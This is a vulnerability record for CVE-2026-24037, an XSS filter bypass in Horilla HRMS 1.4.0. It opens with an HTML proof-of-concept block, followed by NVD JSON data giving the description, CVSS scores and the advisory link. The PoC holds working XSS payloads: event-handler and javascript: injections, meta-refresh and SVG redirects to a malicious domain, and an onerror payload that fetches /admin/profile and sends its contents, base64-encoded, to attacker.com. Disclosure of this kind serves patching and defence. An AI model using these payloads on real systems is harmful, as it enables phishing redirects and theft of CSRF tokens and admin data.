CVE-2026-24037

<!-- XSS Filter Bypass PoC for CVE-2026-24037 --> <!-- Method 1: Event handler without script tag --> <img src=x onerror=alert('XSS')> <!-- Method 2: Using javascript: protocol --> <a href="javascript:alert('XSS')">Click me</a> <!-- Method 3: Data URI --> <a href="data:text/html,<script>alert('XSS')</script>">Link</a> <!-- Method 4: Meta refresh redirect --> <meta http-equiv="refresh" content="0;url=http://malicious-site.com"> <!-- Method 5: CSRF token theft --> <img src=x onerror="fetch('/admin/profile').then(r=>r.text()).then(t=>{fetch('http://attacker.com/log?c='+btoa(t))})"> <!-- Real exploitation: Redirect to malicious domain --> <svg onload="window.location.href='http://malicious-site.com/phishing';">

{"cve": {"id": "CVE-2026-24037", "sourceIdentifier": "[email protected]", "published": "2026-01-22T04:15:59.743", "lastModified": "2026-01-29T18:56:43.700", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Horilla is a free and open source Human Resource Management System (HRMS). In version 1.4.0, the has_xss() function attempts to block XSS by matching input against a set of regex patterns. However, the regexes are incomplete and context-agnostic, making them easy to bypass. Attackers are able to redirect users to malicious domains, run external JavaScript, and steal CSRF tokens that can be used to craft CSRF attacks against admins. This issue has been fixed in version 1.5.0."}, {"lang": "es", "value": "Horilla es un Sistema de Gestión de Recursos Humanos (HRMS) gratuito y de código abierto. En la versión 1.4.0, la función has_xss() intenta bloquear XSS comparando la entrada con un conjunto de patrones de expresiones regulares. Sin embargo, las expresiones regulares son incompletas y agnósticas al contexto, lo que las hace fáciles de eludir. Los atacantes pueden redirigir a los usuarios a dominios maliciosos, ejecutar JavaScript externo y robar tokens CSRF que pueden usarse para elaborar ataques CSRF contra administradores. Este problema ha sido solucionado en la versión 1.5.0."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N", "baseScore": 4.8, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.7, "impactScore": 2.7}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.3, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:horilla:horilla:1.4.0:*:*:*:*:*:*:*", "matchCriteriaId": "55143854-C369-4CAA-B671-90EFC9170F64"}]}]}], "references": [{"url": "https://github.com/horilla-opensource/horilla/releases/tag/1.5.0", "source": "[email protected]", "tags": ["Release Notes"]}, {"url": "https://github.com/horilla-opensource/horilla/security/advisories/GHSA-rqw5-fjm4-rgvm", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}]}}